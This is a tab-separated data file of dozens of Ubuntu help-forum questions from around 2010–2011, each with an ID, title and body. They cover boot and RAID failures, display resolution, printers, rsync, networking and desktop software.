13201	what is the 'dark side ' of skype ?	i have heard and read many rumors about skype but very few tangible informations . skype is said to be engaged in censorship in china according to the official ubuntu wiki , and to have very serious security threats according to french defense classified information files . therefore , although it is widely used in companies , skype is forbidden in universities . what is the part of trueness of those statements ? in the end , am i exposed to security threats if use skype ?
13204	system ca n't find disks on boot	i installed ubuntu server 10.04 on a pc with two hd drives 500 gb each . i used raid1 to provide data protection . the /boot partition is installed also on a mirrored device /dev/md0 . after the installation has completed , the system did not boot properly . i got the following error message : alert ! /dev/disk/by-uuid/ < long characters > does not exist . dropping to a shell ! any idea what could cause such a problem ? update : i booted into rescue mode using the installation cd . executing fdisk showed me the partitions , but it said `` partition 1 does not end on cylinder boundary. '' . can this be related to the problem at hand ? update2 : i re-installed ubuntu server without the raid at all . the system booted as it should be ! also , i got the same error from fdisk after booting . so , this error should not be related to this problem of not being able to boot . it is puzzling me . ca n't i install ubuntu server 10.04 with raid1 ? ! !
13205	debugging php with gdb	i am attempting to debug a sigsegv on php on my ubuntu 9.10 . i 've installed php5-dbg to have the debug symbols available , however , when i start gdb , it shows the following output : reading symbols from /usr/bin/php ... reading symbols from /usr/lib/debug/usr/bin/php5 ... done . ( no debugging symbols found ) ... done . any ideas are welcome . thanks in advance !
13211	reinstall with existing /home luks	my 10.04 machine uses three partitions : 5 gb for /boot , 25 gb for / and 120 gb for /home . / and /home are encrypted with luks passphrase . i 've downloaded the alternate installer in order to reinstall the machine . i want my / partition to be rewritten , but to keep my existing /home . any way to tell the installer my /home already exists in a separate luks partition ? thanks in advance , adam
13212	how do i restore grub after i ran a fixmbr command ?	i have deleted a partition which had an incomplete ubuntu install using windows 7 partition manager . other than that i had a different partition with a working ubuntu but when i deleted the partition and restarted the computer i have found out that grub wont let me enter any operating system so i used the fixmbr command in the windows 7 disc and it seems like grub has been gone and when i boot i do n't receive a choice of an os but it automaticlly loads windows 7 . so my question is how can i get ubuntu back ?
13216	why does n't ubuntu use yast ?	opensuse is known by it 's yast control center , a powerful tool that centralizes all the system configurations . it makes it a lot simpler to configure the system , why does n't ubuntu make use of such a thing ?
13220	how do i install my wacom intuos 2 serial tablet ?	i 've seen many topics on the subjects but they are too complicated for me . i 'm not confident in compiling stuff . is there some headache-free way to make it work under ubuntu ? where do i start ? edit : it does n't seem to work . looking at device '/devices/pnp0/00:08/tty/ttys0 ' : kernel== '' ttys0 '' subsystem== '' tty '' driver== '' '' looking at parent device '/devices/pnp0/00:08 ' : kernels== '' 00:08 '' subsystems== '' pnp '' drivers== '' serial '' attrs { id } == '' pnp0501 '' looking at parent device '/devices/pnp0 ' : kernels== '' pnp0 '' subsystems== '' '' drivers== '' '' action== '' add|change '' , subsystems== '' pnp '' , attrs { id } == '' pnp0501 '' , env { id_input } = '' 1 '' , env { id_input_tablet } = '' 1 '' attrs { id } ==pnp0501 , â : commande introuvable i am a bit confused . am i right to type it in the terminal ?
13224	when creating a new text file , should i add a .txt extension to its name ?	when i create a new document aimed at containing only plain text , i am not obliged by ubuntu to add a .txt extension to its name . it works indeed very well : gedit opens it without problem , understanding very well that it is only text . the only two pro arguments i have found from now on for adding an extension are 1/ interoperability with windows systems and 2/ avoiding confusion with folders having the same name . nevertheless those two arguments do not convince me at all . as a consequence , should i keep the reflex of adding an extension to files or not ?
13227	how do i un-fullscreen kmymoney ?	after updating to ubuntu 10.10 ( gnome ) , kmymoney now opens in fullscreen mode by default , and i ca n't find any option to get out of fullscreen . i 've tried pressing f11 , and i 've taken a pretty good look through the view options , but i ca n't find any way to turn off fullscreen mode . after a little looking , it seems like kmymoney 's preferences ca n't be found in gconf-editor , and there does n't seem to be a command-line switch for turning fullscreen on or off . so i 'm at a loss , and any help would be much appreciated , thanks !
13232	how do i configure my aws instance to serve a remote desktop so i can use windows terminal services to access it ?	my evil plan is to serve rdp from an aws ubuntu instance so i can have a permanent xubuntu desktop as i roam from windows computer to windows computer ( or any computer really ) . it is as easy as running mstsc -v { aws.public.url } . how , through , ssh , can i have the instance serve a remote desktop ?
13235	cloning ( mirroring ) laptop display to area of external monitor display	i 'm using maverick `` 10.10 '' meercat on a hp pavilion tx2110 . this machine has an nvidia go6150 graphics card , and sports a 1280x800 display . i have an external monitor which can do 1280x1024 resolution . fwiw i 'm using openbox as my window manager ; as i understand it this should n't be a factor . i 'd like to clone the display to the monitor , so that the size of the desktop remains at 1280x800 , and there is a horizontal blank area on the external monitor . i.e . i want to avoid having to pan the display of the desktop on either monitor . so the actual resolution of the monitor would be 1280x1024 , but the resolution of the section of the monitor where stuff was actually being displayed would be 1280x800 . using the nvidia-settings applet , i 'm able to set up the cloned display so that the desktop size is 1280x1024 ( the resolution of the external monitor ) , but ca n't find a way to instead have the desktop size stay at the resolution of the laptop 's built-in display . is this achievable ? ideally i 'd like the external monitor 's blank area to be at the top of the screen , i.e . for it to align the display with the bottom of the screen .
13238	can not watch youtube in fullscreen mode	when i am watching videos on youtube and toggle the screen to full screen or switch back from full screen to normal mode , the video stops and sometimes stops loading or starts loading from the start again . i installed ubuntu-restricted-extras so i have flash installed .
13246	is it safe to resize my swap partition on a production system ?	i have a laptop with 4gb ram , but when i first set it up , i had no plans to hibernate so i gave it 2gb swap . i do n't want to use a swap file , so is it safe to resize the swap partition ( and of course the main ext4 partition ) ?
13248	can virtual terminals ( ctrl+alt+f* ) use external monitors ?	my laptop has a broken screen ( for a while now ) and unfortunately i wo n't be able to fix/replace it for a little while longer than i hoped . is there some way that i can get vt 's to show on the external monitor ? ( i ca n't ssh into it , i do n't have another computer to do that with : [ ) .
13249	do i need to configure my laptop dock ?	i have a lenovo thinkpad x61 tablet multitouch computer with a docking station to use dvd player . can ubuntu 10.10 or other versions recognize my docking station and dvd player without any special configuration ? -- this is very important when i install the os through dvd or cds . thanks , xiaodong
13250	is it possible ( aka safe ) to resize a partition while the system is running ?	i 'm talking about resizing my root partition ( / ) , while the system is on ( i know that 's usually impossible , but i 'm just hoping there is some way to do it ) . i want to know if there is some way i can boot the system up in read-only mode ( without a live cd , just in case ) , and resize / . if it ca n't work , i understand , as that is what i already know to be the case ( but you never know =p )
13251	hybrid suspend on hp dv7	i want to enable hybrid suspend on my system . can someone point me to the right info ? plus , i read something about it not working , but is that really true ? or just a system by system issue ? thanks for any information .
13253	how i should proceed to accept translations through the launchpad ?	i just started my new project right now , however i ca n't find any documentation on how i should proceed to accept translations on it . how i should proceed to accept translations through the launchpad.net ? i really need to create a translation group to start accept this kind of contribution ? i do not care if you are a translator or developer , i 'm really interested in hearing from both sides . so , go make your answer below and do n't forget to suggest best practices too . thanks !
13254	screen resolution : xrandr `` can not find mode ''	so i do a vanilla install of 10.04 lucid lynx , and login . the display resolution is clearly smaller than it should be . i did a quick google search , and then run xrandr : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1360x768 59.8 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 59.9 looks great- all i have to do is add a higher mode , 1360x1020 . so i run cvt 1360 1020 and get this : # 1360x1020 59.99 hz ( cvt 1.39m3 ) hsync : 63.47 khz ; pclk : 114.75 mhz modeline `` 1360x1020_60.00 '' 114.75 1360 1448 1584 1808 1020 1023 1027 1058 -hsync +vsync alright . i copy the modeline , run xrandr -- newmode with the modeline that i have , and there 's no errors . however , here 's the problem . when i try to use the new resolution , this is what happens : $ xrandr -- addmode vga1 1360x1020_60.00 xrandr : can not find mode `` 1360x1020_60.00 '' i ca n't figure out why i 'm getting this error , because i seem to have done all of the steps right . if it helps , the monitor is an acer al1714 running on a dell optiplex gx520 . thanks for any assistance in advance . `
13255	how do i propose my project to be part of debian too ?	i have a new project hosted at launchpad.net . my project can be useful for both : ubuntu and debian . however , i ca n't find a documentation to start host my project at launchpad.net and get my package mirrored back to debian . how to propose my project to be part of debian too ? what is the difference between a ubuntu and a debian ? can i keep it hosted at launchpad.net but ask it to be cross-hosted ( and packaged ) at debian too ? thanks in advance .
13259	message during boot : ( process:301 ) : glib-warning ** : getpwuid_r ( ) : failed due to unknown user id ( 0 ) at boot	today when booting my computer ( 10.04 32-bit , system76 lemur ) ubuntu ran the hard drive scan -- as it was finishing the screen went black with this message : ( process:301 ) : glib-warning ** : getpwuid_r ( ) : failed due to unknown user id ( 0 ) no key functions seemed to work . i restarted the computer with the power switch and it has since been functioning fine ... what happened ? is there something wrong ?
13265	how to detect and remove a linux trojan ?	i recently ( re ) stumbled upon this : linux trojan goes unnoticed for almost a year ( unreal ircd ) yes , i know that adding some random ppa/software from an untrusted source is asking for trouble ( or worse ) . i never do that , but many do ( many linux blogs and tabloids promote adding ppas for fancy apps , without warning that it may break your system or worse still , compromise your security . ) how can a trojan horse or a rogue application/script be detected and removed ?
13266	moving from windows to ubuntu . what programs to use ?	maby my question is not related to this forum , but i want to ask . i want to change my os from windows xp to ubuntu 10.6 . but i like some programs in windows , so is there a good programs in linux ( ubuntu ) to change this list of programs ? and i 'll be apprishiated for some links where i can download good software for linux . i need such programs , that i could open their files in windows os environment . for example : .doc , .jpeg , .png , .gif , .txt and others . thanx ! musical players : aimp winamp sound forge kodecks for video , audio etc . microsoft office 2003 , vizio , winrar , adobe reader , dejavju reader , fine reader , adobe photoshop , paint , nero , alcohol 120 % , diamontools , far , total commander , dreamveawer , visual studio 2005 , denwer messangers : qip , icq , skype browsers : opera , mozila antiviruses ! ! nod32 , avast , kaspersky ? translators : lingvo 12 , pragma bittorrent , download master .
13270	why does n't network manager use system network scheme ?	does anybody knows why ubuntu 's nm does'n use native implementations for networking ? for example if i set up a pppoe connection in the network manager ( using nm-applet ) it has it 's own way of storing connections and does n't use native debian networking sheme , for pppoe use pppd and store settings in /etc/ppp/pears . i once configured a wired connection that didn 's show up in /etc/network/interfaces but was visible in nm ... this is bad for me because if i do n't start x , from cli i can not connect to my network connections configured in nm ( or not as easy i would expect ) , for example in cli i could do pon `` dsl-provider '' or poff to turn on or off pppoe connection , but my nm 's pppoe connections are not visible to pppd and if i configure a pppoe connection using pppd is not visible in nm . maybe i am missing something and do n't know how to use it ... thank you .
13271	running evernote 4 with wine in ubuntu	i heard that we can now run evernote with wine . may i know what is the configuration to do so ? ubuntu version : wine version : evernote version : wine configuration ( win xp , win 7 ) : thank you . regards ,
13278	easy backup/restore of installed system ?	is there any easy and open source backup/restore solution for installed ( after clear install ) ubuntu system , like acronis home backup ?
13285	can not get spell check to work	i am running the latest version of ubuntu . going back at least 3 versions and across updates and re-installations i have never and can still not get open office 's spell check to work . this renders the package almost unusable . so my question is 2 fold : 1 ) how can i get the spell check working or is it even possible 2 ) what is a good alternative that : has a working spell check converts in a one click process accurately and reliable to pdf
13287	touchpad mouse sensitivity	i am not sure if its only me or someone else has experienced this as well . i moved to ubuntu from windows and everything is rocking except the touchpad mouse sensitivity . i have tried keeping it to a low level but its still super quick . how do i make is move across the screen just like windows .
13290	will this hardware work well with ubuntu ?	i am preparing to make a significant investment into a new desktop computer . it will be used for work and play . i would like to see if any embers of the community have used any of the components and if anyone can let me know if these will work ok with ubuntu . the system is to support 3 screens as one giant desktop rather than 3 separate desktops . windows should be able to be moved from screen to screen . if anyone can suggest superior alternatives ( and why they would be superior ) that would also be apprecaited here then are the components i am buying intel core i5-760 ( 2.80ghz ) /8mb l3 cache lga1156 processor ci-evga p55 le motherboard 2 seagate 1terabyte sata hard drives liteon ihas-224 24x sata lightscribe dvdrw ci-evga gtx465 1gb ddr5 256bit dual dvi hdmi videocard creative sb x-fi xtreme audio ( sound card ) will a sound card enhance music/movie audio or is it a waste ? 3 lg 20 '' ( possibly larger ) led ( 1600/900 ) % ms/dvi widescreen are led better than lcd ? how large a screen is 'to large ' when it comes to work ( i am a web programmer ) dlink dwa-525 150mbps pci wireless network adapter need good advice on a quality webcam that will work without difficulty on ubuntu need good advice on a brand of pc speakers that gives exceptional sound quliaty i should say , i am not overly familiar with the innards of a pc so i have no idea if i have been oversold . i am also limited on the parts i can get ( for example the sound card is the only sound card that shop had in stock ) though i can order parts if i know what to order . i need to be able to have a multiscreen ( 3 screen ) setup with the ability to move windows between all 3 screens run compiz fusion listen to music watch movies/dvd write code
13294	how to make clutterflow show automatically in nautilus	i 'd like to know if clutterflow can be enabled by default every time i open the nautilus file manager . it 's a really good looking plug-in . update : in 11.04 the icons shown by clutterflow are corrupted .
13296	how do i find the reverse dependency of a package ?	i was wondering if it was possible to check what package another package is a dependency of . for example , jetty is mysteriously installed and running on my system and i 'd like to check whether it is a dependency of something else .
13298	useful apt ( dpkg ) commands	please post your less-known , but useful apt commands involving apt-* , dpkg , or aptitude .
13300	what version of freetype does maverick use ?	the short of it : what version of libfreetype does maverick use ? i 'm currently using lucid and it has libfreetype6 2.3.11 . the long of it : i 'm having trouble with freetype errors when trying to compile wine , and since i 've read that upgrading to a newer version of freetype might fix the problem , i wanted to do that , but i realized that i 'm due for an upgrade from lucid to maverick , and maybe that 'll indirectly fix my freetype errors .
13301	why does n't the clipboard work in modern linux distributions ?	ca n't the developers finally in 2011 move away from the flawed concepts of selections and private clipboards in applications and create a working clipboard service under x window system ? i 'm terribly frustrated because of losing my content after closing applications , because of weird middle button behaviour and for other cases of inferiority of linux clipboard when compared to mac os x or windows . neither glipper , klipper , nor xfce4-clipman can heal my wounds .
13309	is unity already preinstalled inside ubuntu netbook edition ?	is it unity already preinstalled inside ubuntu netbook edition ?
13312	what 's a preferred way now to bulk upload images to flickr ?	preferably no java or mono
13313	where does one get pretty screensavers for xubuntu ( xfce , xscreensaver ) ?	i browsed through the default set of screensavers and the most are ugly , a couple are decent and the only quality ones are flurry , glslideshow , metaballs are popsquares . where does one find more nice screensavers for xubuntu ? apt repository or xfce-look.org does n't seem to have it . or would you recommend running gnome-screensaver instead of xscreensaver ? what options are there so that my screen does n't display rough ( not antialiased ) visualizations of mathematic obsessions ?
13317	how to stop gedit , gvim , vim , nano from adding end-of-file newline char ?	sometimes i want the last line of a text file to be a simple string of text with no newline character appended : ... eg . to concatenate another file to it . several editors automatically modify my text by adding a newline character , even though i have not pressed enter . remains unmodified : emacs , scite , kate , bluefish , notepad ( wine ) newline is added : gedit , gvim , vim , nano i would like to know if there is some way to tweak gedit , gvim , and vim to only save what i have typed ... . and even nano might come in handy i currently use gedit , and i 'm dabbling in gvim/vim.. so it would be useful to know how to `` toggle '' these on/off ... ps . upon re-opening the same file in gedit , gvim , and vim , the cursor 's end-of-file placement is at the end of the text , whereas it should really show up on the next ( empty ) line . this is misleading ( but that 's because of what i 'm used to ) . i used a hexeditor to check the above observatons .
13318	usb mouse freezes	a simple microsoft optical mouse 1000 ( usb ) that runs perfectly on windows , freezes up under ubuntu 10.x and fedora 1x after about 10 minutes of using the os.rebooting , the same problem comes up again in a few minutes . interestingly , the problem does not occur when ubuntu is installed in oracle virtualbox vm . installing ubuntu `` as usual '' ( i.e . not in a vm ) , causes the problem to occur . has any one here faced the same problem or have a solution for it ? maybe using a different mouse that is known to work with ubuntu 10.x ? if it helps my system is : asus p5nsli motherboard ( nvidia nforce 570 chipset ) , 4 gb ram ubuntu 10.10 refers to `` 32 bit '' version of ubuntu it seems that ubuntu has a lot of all types of freeze issues . can someone recommend a version of ubuntu that is fairly recent and stable ? i intend to use ubuntu for ruby on rails development .
13327	what would be the recommended kernel configuration for a gaming machine ?	i have read a lot of talk about how opensuse is using a `` desktop '' kernel . this kernel utilizes a 1000hz timer and full preemption among other things . the feature request here goes into more detail about the subject . open fate opensuse desktop kernel i know how to compile and configure my own kernel , though i do not understand the real advantages to it . would perhaps disabling nohz , or unused featured such as hyperthreading ( on my cpu anyway ) and virtualization . ( as well as the settings above ) . would it really improve interactivity or response in a game ? if so , does anyone have any suggestions in configuring my kernel for such a purpose ? update : i did some digging by reading a few mailing lists , and it seems voluntary preemption is best . it has less issues with some drivers as does full preemption and still offers good latency . 1000hz seems like a solid choice considering if the kernel is compiled with no_hz . this means that it will only fire ticks when they are needed . i am strongly assuming optimizing the kernel for your arch will help , as well as specifically disabling unused modules . it states in kernel documentation that if you do not have a smt ( hyperthreading ) system , that you can improve throughput by disabling that option . i have no evidence that this is the case , however it seems like it would not hurt . also after some testing it seems the new cfq is a good scheduler for desktop/gaming use , it seems to offer good performance when running something disk heavy like creating a dvd tree . really the ubuntu generic kernel is set up well for good soft latency . adding the 1000hz should be under review though .
13328	videos pause automatically	i installed ubuntu on multiple computers by following this guide . now many of my users complain that while playing video ( xvid or mp4 ) , after few minutes videos go into a paused state , and only resume playing if the mouse cursor is moved . it happens on vlc and movie player as well . i have installed codecs from the mediubuntu repository . the systems are fully updated .
13334	thunderbird freezes when downloading large mails	i have three mails boxes . while downloading mails with large attachments , thunderbirds freeze ( going gray ) . anything is fine when downloading is finished but by the way i ca n't read my mails in this time . has someone had this problem ?
13335	print from virtualbox to networked printer	i run ubuntu 10.10 64-bit desktop edition and i have panasonic networked printer kx - mx2000 printer . there are no 64 bit drivers available from panasonic for ubuntu/debian . they only have 32 bit drivers for rhel : ( so - there is no way i can print from my computer to that networked printer directly . so - my idea was to install printer drivers onto windows xp virtualbox guest and just printer from virtual machine . i 've installed xp drivers onto guest , virtualbox network adapter set to bridged , i can see printer in the browser from guest , i can ping printer from guest but when i try to print nothing happens . what am i doing wrong . is there something else i have to configure ? update : panasonic red hat drivers : http : //panasonic.net/pcc/support/fax/common/table/linuxdriver.html to install them on ubuntu sudo alien -- scripts -k libjbig-1.0.0-1.i386.rpm libtetra-1.0.0-2.i386.rpm rastertogdi-1.0.1-9.i386.rpm sudo dpkg -i libjbig_1.0.0-1_i386.deb libtetra_1.0.0-2_i386.deb rastertogdi_1.0.1-9_i386.deb sudo service cups restart now - there will be some errors during execution which should n't affect anything . but the problem is i can not get it to work on ubuntu maverick 10.10 64 bits ( or any other 64 bits distro for that reason . only tried on ubuntu 10.10 64 though. ) . any sugguestions guys ? : ) thanks
13337	how do i measure server power consumption ?	is there a command , or package that can be used to calculate how much power my server is drawing ? i am interested in knowing how much my server is costing me to run . i know the calculations of how much it would cost if drawing the full 300 watts from the psu , but i believe that this is unlikely to be the reality of it . it is being used as a file and media server , so most of the time it will be reasonably idle . it is also running as a headless server , so all i am interested in , is the server itself .
13347	how do i get multitouch working on a on asus eee pc 1215n ?	just installed fresh ubuntu 10.10 on my eee pc 1215n and found that multitouch does n't work properly ? is there any specific driver ? any suggestions ?
13348	how do i check my version of gnome-shell ?	there 's got to be some simple way i 'm missing , but for the life of me i ca n't find it . how do i check my version of gnome-shell ?
13350	what emulation mode for an epson printer is best ?	i 'm looking for a color duplex printer for ubuntu . my favourites are epson b-310n and brother hl 4050cdn . the latter should be work with linux , but i 'd prefer the first one , because printing costs are cheaper . the epson printer has `` epson esc/p raster '' , `` pcl3 '' , and `` epson esc/p2 '' emulation . can i use the printer with one of those emulations under linux ? were there any restrictions ( like unusable duplex ) ?
13351	what horoscope or astrology software is available ?	i am looking for horoscope or astrology software in ubuntu especially for 9.04 or 10.04 version .
13352	how to install steel storm from source ?	there is no deb package . how can i install it anyway ? http : //www.steel-storm.com/
13357	how to get the source code of a project from launchpad	how to get the source code of a project from launchpad
13359	using rsync with exclude/include	i 'm running 2 ubuntu 9.10 servers . i have to synchronize the changes between these two machines . the following are the directories i 've to synchronize : /usr , /etc , /var , /bin , /sbin , /lib i 'm using rsync like the below for replication : rsync -avp 192.168.2.100 : /usr/ /usr rsync -avp 192.168.2.100 : /etc/ /etc -- -- -- here i 'll have to exclude many files like /etc/udev/* , /etc/hosts , /etc/hostname , ... i tried using rsync -avp -- exclude '/etc/fstab ' 192.168.2.100 : /etc/ /etc but it overwritten entire /etc directory can any one edit and give me rsync to one line command which synchronizes specified directories and not which are excluded ? . need help !
13362	how do i build my own home network ?	i 'd like to have my own ubuntu-based home network . that means , that i can access all my multimedia files from each computer . music/files/videos are on ubuntu 10.10 . i 'd like to have access to these files from windows 7 and ubuntu 10.10 . i 'd like to have full permissions/privileges . what 's the easiest to get this working ?
13363	how to delete or replace an already created symbolic link ?	i am working on my project using network simulator2.i installed it and everything is fine.the symbolic link created to use the command ns of the installed application is $ sudo ln -s /home/vinaychalluru/ns-allinone-2.34/ns-2.34/ns /usr/bin/ns i came to know that trying to create a new symbolic link with name ns gives ln : creating symbolic link '/usr/bin/ns ' : file exists how can i delete the already created symlink or can i replace it with any other commands ?
13370	ctrl+t does n't create a new tab anymore	pretty new to ubuntu , i tried to change some keyboard shortcut . so i assigned under the system > preferences > keyboard shortcuts ctrl+t to an operation . then i realised that with chrome ctrl+t was not opening me a new tab but doing the operation configured earlier . now i ca n't make ctr+t create a new tab on chrome . someone does know how can i put it back please ? ps . i am on gnome
13382	download a file over an active ssh session	so i 'm sshed into my ubuntu server from my ubuntu desktop . i 'm at a certain path and i want to download a file to my local filesystem ( preferably the path i was at before i entered the ssh session ) . i could mount ssh and pull the file across by mouse but what if i was trying to get a root file and logging in by root directly is disallowed ? even if that was n't the case ( it is n't now ) , surely there must be a simple way of pulling back a file over an active ssh connection . surely !
13384	getting access to network server	i logon to my server successfully and can transfer files off the server to my desktop . but i ca n't put any files back . i get a `` permission denied '' error . i know i have full access to the network server because on a mac after i mount the server , i can do whatever i want . how do i change permissions ? it is an smb server . i am logged in as a user with administrator privileges . when i check for permissions in nautilus , it says it ca n't determine them . thanks .
13389	command works partially when run from startup applications	i have this script ( or rather a set of commands which has permission to execute ) to enable two finger scrolling and two finger tap = right click the script is located in /home/gaurav/multigesture/multigesture . when i run the following command in terminal , two finger scrolling and two finger tap = right click start working . i have to run this command each time i boot my laptop . `` /home/gaurav/multigesture/multigesture '' so i put this command in the startup applications so that i dont have to run the command each time i boot but when i reboot two finger scrolling is not working , only two finger tap = right click works . what could be the problem , if the command works fine from the terminal then how come it is working partially when i put it into startup applications . here is the content of the script xinput set-int-prop `` synps/2 synaptics touchpad '' `` two-finger scrolling '' 8 1 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger scrolling '' 8 1 1 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger pressure '' 32 10 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger width '' 32 8 ps . the file which has all the commands ( script 's ) name is multitouch
13390	moving windows 7 to a virtual machine	ive decided to switch from my existing dual boot solution , to just running ubuntu and having windows 7 in a virtual machine for those times that it absolutely has to be windows . ive been looking at my options for doing this , and one solution ive come up with is to take an image of my windows 7 install , reformat , and install my windows 7 image on a virtual machine . would this be possible ?
13398	doom-ii-like red flashing screen	i want my screen to flash red so that it looks similar to getting hit by a rocket in doom ii , preferably using cli tools . i 've seen that redshift does something similar just way too slow so i tried using xrandr but could n't figure out how to do what i want properly . can xrandr ( cli ) do this and if so , how ? also i 'm using compiz . maybe there is a way to do it with compiz using dbus-send ?
13401	how can i run unity 11.04 in qemu ?	i want to try ubuntu natty with the unity desktop and the compiz support from the ppa in qemu . but i ca n't get the graphic support to run unity . is it possible to get compositing running with qemu ?
13403	how can i stop top-panel from overlapping window border in dualscreen mode ?	i have a dual-screen setup with mu laptop screen as primary and my lcd screen as secondary placed over the laptop screen . on my laptop screen i have a top-panel at the top of the screen and docky at the bottom . when the lcd screen is off/disconnected , there is no problem when maximizing the window on the laptop screen , but when it is on , the top-window border gets hidden behind my top-panel . how can i get it to only maximize to the panel and not below it ? it is quite annoying that i can not get to the min/maximize/close window buttons etc .
13407	how to add columns displaying audio and photo ( exif ) metadata information into nautilus list view	in nautilus , i would like to add columns displaying metadatas contained in files . this is mostly useful with audio and pictures files : audio : artist , album , track title , year ... ( id3 tags ) photos : date taken , image resolution , columns would be editable in the standard 'view - visible columns ' option in nautilus
13412	xbmc doesn’t downmix sound from 5.1 to stereo	i have installed xbmc ( team-xbmc ppa ) on my laptop ( kubuntu 10.10 ) and the sound from 5.1 movies isn’t downmixed correctly to stereo , even though the option is enabled . i have already tried http : //forum.xbmc.org/showpost.php ? p=587582 & postcount=286 and it didn’t change a thing . other players ( vlc… ) can do this correctly . any suggestions ?
13413	data recovery and defragmentation	i recently lost all my windows data . i tried running photorec and i was able to recover some 18 gb of data back . photorec threw an error after recovering 18 gb stating `` segmentation fault '' . was it because my windows drive was hardly ever defragged ? if so , what routines/precautions i can take to make sure if something like this happens again on windows or linux side , photorec wont throw the `` segmentation fault '' error . ( of course one precaution being backing up data regularly : - ) )
13415	what are .run files ?	what exactly are .run files and what are they used for ? i 've seen a couple of those lately and i 'm simply wondering what file format it is used for .
13417	panel applet where you update your status on gwibber is not easy to update facebook status from	in the text box , it says `` post to : facebook ... '' when i first open it up . once i start type , this text does not disappear . i have to delete the characters one by one with my delete key and it makes updating my status from the menu very unbearable . i do not recall this happening in lucid lynx . maverick has seemed to change the menu which introduced this problem .
13418	windows home server equivalent	what windows home server equivalents are available for ubuntu ? i am specifically looking for file sharing , backups , media streaming etc ... obviously ubuntu can do all of these out of the box , but i was wondering whether there was a nice interface out there that would cover it all ... thanks rich
13420	updating firmware on a hp color laserjet cp2025dn	there is new firmware available on the hp site for my printer , a hp color laserjet cp2025dn , but seems to be only available as a windows executable . how do i upgrade my printer 's firmware using ubuntu ?
13429	take action if remote server responds to ping	i have a network attached storage ( nas ) at home where i store pretty much all my media stuff ( songs , videos , etc ) . i would like to mount it to a local directory in my notebook automatically every time i login at home so before mounting it i need to do a ping to see if it is answering ( which means i 'm home ) . i already have the script to mount it ( see below ) but i have two questions : 1 ) how to use the answer from ping in order to see if its answering ? i believe i have to use grep together with the ping command , but since i 'm a new *nix user i 'm not very fluent with it yet . 2 ) where is the best place to put this script ? the mount command i have is this : sudo mount -t cifs //myipaddress/remotedir /media/mylibrary -o username=myusername , password=mypassword , domain=mydomain , iocharset=utf8 , file_mode=0777 , dir_mode=0777 thanks !
13433	is there a way to turn off individual screens ?	i use xset to turn off my screens like this : xset dpms force off is there any way to turn off a single screen when you have more than one associated with the same x display ?
13439	how do i give apache access to a samba share ?	i 'm running a web server and the public_html folder is in a windows network drive shared by samba on ubuntu server 10.04 . i have apache2 vh set to point to the folder and it works great . however , when my drupal 6 install tries to create its default files it can not write to the locations required . now , because this is only a dev machine ; i have added www-data user and group to the visudo with all= ( all ) all i have also gone and changed the httpd.conf file to have the following : < directory /media/samba > order allow , deny allow from all < /directory > when i change the envvars username to username with admin privileges it works just fine . is there something i need to do with chmod to get www-data to work ?
13441	how to kill applications	i have been playing around with ubuntu installing new themes and and docks . sometimes during the installation , whole screen just hangs . what is the best way in ubuntu to kill a process/application ? anything similar to ctrl + alt + del of windows ?
13447	how do i change the default text editor ?	how can i change my default text editor from gedit to emacs ?
13453	frozen window carcass that does n't want to leave	i have this problem : larger image seems like something has frozen . this happens after every reboot now . how do i track what is frozen and what to kill ?
13455	split ogg-theora video files without re-encoding ?	good evening all , i have decided to rip my entire dvd collection to ogg-theora video , specifically a few different tv series ' that i have so i do n't have to keep digging the discs out . to do this , i have been using dvd : :rip to pull the individual vob files from the disc and then using ffmpeg2theora to encode . this process has been working great for me until i hit a slight snag . the dvd i just ripped does not have the individual episodes in vobs , but the entire disc of 7 episodes in one vob . i went ahead and ripped it and encoded the whole thing into theora . now , how do i split this file into the individual episodes ? i would prefer not to re-encode these , and obviously any prospective program would need a easy way for me to set the 'cut ' points . i have used a few similar programs in windows ( for other formats ) , but i am unsure of what is out there for ubuntu . does anyone have any suggestions ? thanks !
13456	what horoscope software is available ?	i am looking for horoscope software in ubuntu
13464	how can i customize/disable notification bubbles ?	is there a way you can disable or customize the notification bubbles on lucid ?
13469	displaying the system time in empathy status	is it possible to display the current time in empathy status , and perform simple manipulations , like currenttime + 10minutes i am using lucid lynx . thanks
13470	can upgrading packages during an in-progress backup render the backup unusable ?	i am running backuppc , which backs up my laptop via rsync to another computer daily . suppose that i upgrade one or more packages during the backup process . is it possible that the package will be broken in the backup because some of its files came from the old version and some from the newly-upgraded version ? how likely is this ?
13474	how do i extract a password protected .7z file ?	can someone tell me how can i extract a password protected .7z file in ubuntu server ? ( i know the password , i just need a program to do so and an example of how to use said program ... )
13479	easy way to switch network proxy settings ?	i regularly use a http proxy for blocked sites here in china . however , it slows things down in general even for unblocked sites . is there an easy way of switching proxy profiles ? i 'd prefer not to have to go in to network proxy everytime , if there is . cheers ! running 10.10 on an acer netbook
13480	usbmon module missing ?	i am trying to monitor the usb traffic in ubuntu 10.0.4 . according to many websites , the usbmon is already included in the kernel , but typing modprobe usbmon . it will return `` ca n't find module '' . do i have to recompile the usbmon module ?
13485	change kde kickoff slide effect speed	how can i change or increase the kde kickoff slide effect speed ? i do n't mean when moving from one tab to another ( favourites to applications , for instance ) - i mean from menu to submenu ( so clicking on `` internet '' to reveal a list of internet-oriented applications , like a web browser , im client etc. ) . i find the default sliding speed to be just slightly too choppy and slow and pretty irksome ( especially when the rest of the kde desktop is so smooth ) .
13487	gnome mplayer : `` failed to open vdpau backend libvdpau_nvidia.so '' error	using gnome mplayer everytime i play a video , i get the annoying dialog pop-out in the screenshot below .
13493	how i get twidge to work with identi.ca ?	i want to use twidge to connect to my identi.ca-account . i already successfully authenticated the client against identi.ca . but if i execute twidge lsrecent i get the following error : twidge : user error ( bad response : 401 ) what is wrong and has to be changed ?
13497	problems after resuming from hibernate	i have a problem with maverick when resuming from hibernate . here 's a screen shot : ( image error ) also i 'm getting the following errors before the screen appears : *error* render ring head not reset to zero ctl 00 ... *error* render ring head forced to zero ctl 00000 ... i tried upgrading to ppa kernel to 2.5.36 and 2.5.37 beta but the problem persists . i have a vaio notebook with an intel graphics card 4500mhd . anyone knows of a fix ?
